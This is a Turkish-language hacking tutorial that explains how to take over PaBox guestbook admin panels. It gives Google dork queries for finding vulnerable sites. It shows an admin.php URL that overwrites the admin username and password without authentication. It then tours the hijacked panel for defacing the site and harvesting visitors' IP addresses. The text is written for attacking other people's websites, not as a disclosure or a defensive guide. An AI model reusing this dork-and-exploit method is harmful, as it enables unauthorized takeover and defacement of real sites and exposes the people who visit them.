PaBox Admin Panel Vulnerable
Sizlere PaBox Panel’de Admin olmaktan bahsedecegim.Bu Açigi Kapatan Siteler %30 u geçmez yani %70 i bizim demektir.Ben sahsen denedim:).
Ilk önce En büyük yardimcimiz olan Google dan baslayalim.Burda dikkat etmeniz gereken bir husus bu scriptin ana sayfasinin index.php yerine thebox.php olmasi... ve çogunlukla da thebox klasöründe bulunmaktadir.
inurl:thebox/thebox.php
inurl:thebox/admin.php
intitle:PaBox Admin Panel
...
Sadece bu verdiklerim ile yetinmeyin kendiniz de bir seyler yapin mesela sonlarina site:il... seklinde ekleyip ülkesini, belirtebilirsiniz...
Sitemizi bulduk http://www.example.com/thebox/thebox.php Burada görmüs oldugunuz
/thebox.php yerine
/admin.php?act=write&username=Z@M@N&password=Hacker&aduser=Z@M@N&adpass=Hacker
yaziyoruz daha sonra 2 defa yönlendirme(Yönlendirmede beklememek için linklere tiklayin ) çikacak ve bizi admin paneline yönlendircek.
Kullanici Adi: Z@M@N
Sifre: Hacker
---------------------------------
Thanks for loggin in, Z@M@N!
Now taking you to your admin panel...
---------------------------------
yazisini görünce bilinki artik admin paneliyiz.
Admin Panel AnaSayfasi (admin.php?act=main)
Asagidaki resimde de görmüs oldugunuz gibi Site Name yazan yere sitenin basligini yazacaksiniz.Onun alti ise Background Color: Arka Plan rengini belirler.
Edit Language Attributes (admin.php?act=lang)
Burada görmüs oldugunuz kelimelerin ana sayfadaki yerlerini bulup ona göre düzenleyebilirsiniz veya Assagidaki gibi de yapabilirsiniz. 
View Log (admin.php?act=ip)
Mesaj yazanlarinin iplerini ögrenebilirsiniz.(Paylasima açik bilgisayarlari bulabilirsiniz.)
Edit CSS File (admin.php?act=css)
Burada ise sitenin css lerini degistirerek indeximizi çok daha güzel bir görünüm kazandirabiliriz.
Anasayfamizin Son Hali... (thebox.php)
Evet iste geldik Sona....
Ve Mutlu son...
Bu döküman bana aittir baska bir yerden alinmamistir.
Not:Misyon Haricinde Kullanilmasi ve Izinsiz Baska Platformlarda Yayimlanmasi Yasaktir. Z@M@N
